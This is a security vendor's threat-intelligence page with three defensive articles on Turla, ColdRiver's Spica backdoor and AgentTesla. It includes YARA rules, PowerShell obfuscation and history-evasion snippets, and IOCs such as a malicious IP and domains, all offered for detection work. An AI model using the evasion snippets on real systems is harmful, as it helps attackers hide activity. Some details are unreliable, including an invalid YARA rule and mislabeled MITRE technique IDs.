company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

APT35

loading..
loading..
loading..

Magic Hound (APT35): Iranian State-Sponsored Cyber Espionage

Discover the tactics of Magic Hound (APT35), an Iranian state-sponsored threat group, targeting various industries with sophisticated cyber espionage campaigns

07-Aug-2023
12 min read

Related Articles

loading..

Turla

APT

Uncover the latest tactics of Russia's Turla APT. This technical report analyze...

Turla, a Russian state-sponsored Advanced Persistent Threat (APT) group, conducts sophisticated cyberespionage against government institutions, NGOs, and organizations aligned with Russian interests. This [Threat Research](https://www.secureblink.com/threat-research) provides a detailed analysis of Turla's historical context, recent operations named "Turla Wields," and a thorough technical analysis of their tools and techniques. ### Origins and Historical Context Turla, also known as Snake, Uroburos, Waterbug, and Venomous Bear, emerged in the late 1990s, targeting governments and militaries globally. Their operations align with Russia's geopolitical interests, focusing on nations bordering Russia and former Soviet states. Turla is adept at evading detection, preferring long-term intelligence gathering over disruptive attacks. ### Turla Wields: Recent Attack Trends and Targeting Recent campaigns target NGOs, particularly those supporting Ukrainian causes. Turla exploits legacy infections like Andromeda botnet, employs spear-phishing with weaponized PDFs, and constantly evolves its toolkit, including TinyTurla-NG and TurlaPower-NG. Motives range from military intelligence gathering to destabilizing opposition parties and supporting hybrid warfare. ### Technical Analysis of Turla Techniques Turla's initial infection vectors include spear-phishing, zero-day vulnerabilities, and compromised websites. They establish persistence using TinyTurla-NG, leveraging DLL loading and file masquerading. Communication with command and control servers is disguised within regular web traffic, employing redundant C2s for resilience. ### Data Exfiltration Techniques Turla employs custom tools like TurlaPower-NG to target password managers and browser history databases. Data exfiltration involves file archiving and staged uploads, obscuring their activities over time. ### "Living off the Land" Approach Turla increasingly relies on PowerShell for operations, employing obfuscation techniques and disabling command history recording to evade detection. ### Countermeasures and Defense Considerations Patching vulnerabilities, especially zero-days, is crucial. Endpoint Detection and Response (EDR) platforms with behavioral baselining and anomaly detection can spot Turla's subtle activities. Application and script whitelisting, along with security awareness training, enhance defenses. Web infrastructure hardening and intrusion detection systems are also recommended. ## Technical Analysis: Evolving Toolset Breakdown ### TinyTurla-NG and TurlaPower-NG Deep Dive #### TinyTurla-NG - Network Protocols: HTTP/HTTPS with custom headers and unusual User-Agent strings. - C2 Commands: Task scheduling logic and data encoding for exfiltration. - Persistence: Registry hiding, DLL hijacking methods, and boot-time execution. #### TurlaPower-NG - Target Files: Focus on password managers and browser history SQLite databases. - Data Extraction Logic: Parsing methods and obfuscation techniques. - Archiving: Compression and encryption methods used for file uploads. ### Obfuscation and Anti-Forensics Turla employs meaningless variable names, packed executables, and sandbox evasion techniques to hinder analysis. They ensure minimal forensic traces by cleaning temporary files and overwriting disk images. ### Historical Malware Progression Turla's tools have evolved from executable-based to PowerShell-based, leveraging trusted Windows programs for stealth and adaptability. Staged exfiltration and variable beaconing remain consistent features across toolsets. ## Victim Profiling & Targeting Patterns ### Target Industries & Organizations Turla targets a range of industries, including defense, technology, government, diplomacy, and NGOs. Specific organizations and job titles vary, with a focus on technical staff for network compromise and decision-makers for policy insight. ### Geographic Shifts & Geopolitical Correlation Turla's targeting intensifies around geopolitical events involving Russia, such as elections and conflicts. Analysis reveals patterns of intelligence gathering preceding significant actions, indicating strategic alignment with Russian interests. ## Code Snippets for Detection The following are representative indicators based on open-sourced reports on TinyTurla-NG and similar C2 mechanisms Turla often uses. Use with caution – APTs evolve, so these patterns may change in future samples: `Registry Modification (Possible Turla DLL Loading)` HKEY_CURRENT_USER\Software\Classes\CLSID\{<unusual-looking-GUID>} –Suspicious values within this key can point to persistence via COM object loading `Unusual HTTP Beaconing Traffic Patterns` # Example YARA-like Pattern – simplified - targeting WordPress C2 traffic rule turla_wp_beacon { meta: description = "Possible Turla compromise of WordPress sites for C2" author = "<Your Org Name>" date = "2024-02-27" strings: $http_header = {Content-Type: multipart/form-data;} $beacon_id = /page=[0-9]{8}/ condition: $http_header and $beacon_id and all of them } `PowerShell Obfuscation Techniques (Simplified Examples)` PowerShell # Base64 Encoding to Conceal Commands $cmd = "iex <base64 encoded command>" Invoke-Expression $cmd # Modifying Command Execution Flow $var = 'Something'; $var[3..1] -join '' # Reconstructs a hidden string # PowerShell History Evasion Set-PSReadLineOption -HistorySaveStyle SaveNothing ## Conclusion Turla's persistence and adaptability make them a formidable threat to global security. Understanding their techniques and motivations is crucial for developing effective defense strategies. By implementing rigorous countermeasures and leveraging threat intelligence, organizations can mitigate the risk posed by Turla's cyberespionage activities.

loading..   21-Feb-2024
loading..   1 min read
loading..

APT

Phishing

Explore ColdRiver's Spica malware in this detailed threat analysis. Uncover Russ...

ColdRiver, a Russia-backed advanced persistent threat (APT) group, has advanced cyber espionage tactics by introducing a custom malware named "Spica." This marks a substantial departure from their traditional long-con credential phishing methods. Google's Threat Analysis Group (TAG) has been actively instrumental in tracking ColdRiver's activities, highlighting their ever-evolving techniques. This [Threat Research](https://www.secureblink.com/threat-research) aims to extend this analysis of ColdRiver, dissecting and scrutinizing the critical underlying aspects of its Spica malware, emphasizing the threat landscape and potential countermeasures. ## Contextual Background ColdRiver, also known as Blue Charlie, Callisto, Star Blizzard, or UNC4057, primarily targets high-profile individuals in NGOs, former intelligence and military officials, and NATO governments. Historically focused on credential phishing, the group has now extended its capabilities to deliver malware, specifically using PDFs as lure documents. ## Evolution of Tactics The progression from traditional phishing to malware delivery is a strategic transition [observed](https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/) by TAG. ColdRiver employs impersonation accounts, posing as experts or individuals affiliated with the target, to establish trust. Recent findings reveal an intricate tactic where benign PDFs, presented as op-eds or articles, are delivered to targets. If the target cannot decipher the encrypted content, a link to a "decryption" utility is sent, introducing the Spica backdoor. ## Spica Malware Analysis ### Infiltration and Execution Spica, written in Rust, utilizes JSON over websockets for command and control (C2). Upon execution, it decodes an embedded PDF, serving as a decoy while establishing persistence and connecting to the C2 server. The malware deploys an obfuscated PowerShell command, creating a scheduled task named "CalendarChecker" for persistence. ### Functional Capabilities Spica functions as a versatile tool, executing arbitrary shell commands, stealing cookies from various browsers, uploading and downloading files, perusing the filesystem, and enumerating documents for exfiltration. The presence of multiple variants suggests a continuous evolution of the backdoor. ### Timeline and Persistence TAG first observed Spica in September 2023, but they believe its usage dates back to November 2022. The malware, identified as "Proton-decrypter.exe," was likely active around August and September 2023. TAG notes the potential existence of multiple Spica versions, each with distinct embedded decoy documents. ## Implications and Targets ColdRiver's strategic shift indicates a desire for broader capabilities, allowing them to conduct operations beyond conventional phishing. The targets include Ukraine, NATO countries, academic institutions, and NGOs. While specific victim profiles remain undisclosed, TAG emphasizes the limited and targeted use of Spica, aligning with ColdRiver's established tactics. ## Defensive Measures To counter the ColdRiver threat, TAG emphasizes proactive security measures. All identified domains, websites, and files associated with the threat are added to Safe Browsing blocklists. Gmail and Workspace users targeted by government-backed attackers receive alerts, encouraging them to enable Enhanced Safe Browsing for Chrome and ensure device updates. ## Code and Technical Insights ### Spica Backdoor Code TAG provides a YARA rule for detecting the Spica backdoor, outlining specific strings and patterns indicative of its presence. This code analysis aids cybersecurity professionals in identifying and mitigating potential threats. ```yara rule SPICA__Strings { meta: author = “Google TAG” description = "Rust backdoor using websockets for C2 and embedded decoy PDF" hash = "37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9" strings: $s1 = "os_win.c:%d: (%lu) %s(%s) - %s" $s2 = "winWrite1" $s3 = "winWrite2" $s4 = "DNS resolution panicked" $s5 = "struct Dox" $s6 = "struct Telegram" $s8 = "struct Download" $s9 = "spica" $s10 = "Failed to open the subkey after setting the value." $s11 = "Card Holder: Bull Gayts" $s12 = "Card Number: 7/ 3310 0195 4865" $s13 = "CVV: 592" $s14 = "Card Expired: 03/28" $a0 = "agent\\src\\archive.rs" $a1 = "agent\\src\\main.rs" $a2 = "agent\\src\\utils.rs" $a3 = "agent\\src\\command\\dox.rs" $a4 = "agent\\src\\command\\shell.rs" $a5 = "agent\\src\\command\\telegram.rs" $a6 = "agent\\src\\command\\mod.rs" $a7 = "agent\\src\\command\\mod.rs" $a8 = "agent\\src\\command\\cookie\\mod.rs" $a9 = "agent\\src\\command\\cookie\\browser\\mod.rs" $a10 = "agent\\src\\command\\cookie\\browser\\browser_name.rs" condition: 7 of ($s*) or 5 of ($a*) }. ``` ## Conclusion ColdRiver's adoption of the Spica malware turned out to be a calculated evolution in their threat evolution. This extended analysis presented here offers a thorough breakdown of these tactics and techniques, Spica's technical intricacies, and recommended defensive measures.

loading..   31-Jan-2024
loading..   1 min read
loading..

Infostealer

Explore the stealthy tactics of AgentTesla, distributed via deceptive CHM files ...

We have comprehensively analyzed the infostealer in this threat research delving into the intricate workings of AgentTesla, operating since 2014. The following sections provide a rigorous analysis of its tactics, evolution, and the technical nuances observed during recent encounters. ## Evolution of AgentTesla ### Initial Access via Spam Emails AgentTesla infiltrates systems primarily through spam emails carrying malicious attachments, often in the form of .doc, .xls, and .ppt files[^1^]. These attachments, housing macros, facilitate the installation of AgentTesla onto the victim's system[^1^]. #### Recent Encounter: Gzip Compressed File On October 4, 2023, a malicious Gzip compressed file within VirusTotal triggered the initiation of AgentTesla infection[^1^]. This underscores the malware's continuous evolution and adaptability in its attack vectors[^1^]. ### CHM File Exploitation AgentTesla's sophistication is evident in its use of CHM files, compressed with Gzip, acting as a lure[^1^]. Recent campaigns indicate a focus on targeting professionals in network engineering, telecommunications, or information technology[^1^]. #### PowerShell Script Execution Upon opening the crafted CHM file, a PowerShell script is downloaded from a remote server, encoded and deflated to avoid detection[^1^]. This script further reveals a loader DLL file, named Hur.dll, responsible for loading the AgentTesla malware[^1^]. #### Infection Chain The infection chain starts with a malicious spam email delivering a Gzip-compressed file that, upon execution, runs a PowerShell command, initiating the download and execution of AgentTesla[^1^]. ### PDF-Based Attacks AgentTesla exhibits versatility by utilizing PDF files for distribution[^1^]. PDF campaigns employ two methods: triggering a PowerShell command and displaying a fake message leading to the download of a PPAM file[^1^]. #### JavaScript Execution Upon execution, the PDF initiates JavaScript execution, triggering a malicious PowerShell script hosted at "htlbook.blogspot.com/atom.xml"[^1^]. ## Technical Analysis ### PowerShell Script Decryption The critical PowerShell script, "nn.txt," employs Base64 encoding and deflation to conceal a second Base64-encoded string representing a malicious DLL[^1^]. This DLL, named Hur.dll, undergoes decryption, exposing encrypted data within its resource section[^1^]. #### Decrypted AgentTesla Payload The decrypted data reveals the AgentTesla malware, invoking various APIs for malicious purposes[^1^]. This payload exhibits complex and dynamic behavior, making it a formidable challenge to detect and eradicate[^1^]. ### Campaign Variations #### CHM Campaign Insights Campaigns involving CHM files showcase AgentTesla's dynamic adaptation, with encrypted data in the resource section revealing a persistent threat[^1^]. #### PDF Campaign Nuances PDF-based campaigns leverage JavaScript execution and fake messages to entice users into AgentTesla infection[^1^]. The use of PPAM files and VBA macros further illustrates the malware's multifaceted approach[^1^]. ## Conclusion AgentTesla's resourceful tactics in data pilfering pose a significant and enduring threat to organizations and individuals alike[^1^]. Its diverse attack vectors demand a multifaceted defense strategy, emphasizing the importance of robust email filtering, cautious link and attachment handling, and reliable antivirus solutions[^1^]. ## Recommendations 1. Implement robust email filtering solutions to detect and block spam emails and malicious attachments. 2. Exercise caution when opening links and email attachments, verifying their authenticity. 3. Utilize reputable antivirus and Internet security software on all connected devices. 4. Stay informed about MITRE ATT&CK® techniques associated with AgentTesla, adapting defenses accordingly[^1^]. ## MITRE ATT&CK® Techniques ### Initial Access - Phishing (T1566.001): AgentTesla employs phishing emails with malicious attachments[^1^]. ### Execution - User Execution (T1203): Victims open malicious attachments, initiating AgentTesla execution[^1^]. - Command and Scripting Interpreter (T1059.001): PowerShell commands download and execute additional payloads[^1^]. ### Persistence - Registry Run Keys / Startup Folder (T1547.001): AgentTesla adds a run entry for persistence[^1^]. ### Defense Evasion - Masquerading (T1036.006): PowerShell scripts masquerade as text files[^1^]. ### Collection - Data from Local System (T1005): AgentTesla collects sensitive data from the victim's system[^1^]. ### Command and Control - Application Layer Protocol: Web Protocols (T1437.001): AgentTesla communicates with C&C servers using HTTP[^1^]. ### Exfiltration - Exfiltration Over C2 Channel (T1041): AgentTesla exfiltrates data over C&C channels[^1^]. ## Indicators of Compromise (IOCs) - Malicious CHM files, Gzip-compressed, SHA256 hashes: 5df434..., 00dc35..., a4de9d..., c7ebda..., 6665f9..., 0bcc3c...[^1^]. - Malicious IP: 82.115.209.180[^1^]. - Malicious Domains: htlbook.blogspot.com/atom.xml, hxxps://booking-comdetails.blogspot.com/[^1^]. - Malicious PDF file, SHA256 hash: 92533be6c7fd...[^1^]. - PPAM file, SHA256 hash: 3a8ac8048d42...[^1^]. ## Final Thoughts This meticulous analysis underscores the ever-evolving threat landscape presented by AgentTesla. Organizations and individuals must remain vigilant, implementing proactive security measures to mitigate the risks posed by this resilient malware[^1^].

loading..   17-Jan-2024
loading..   1 min read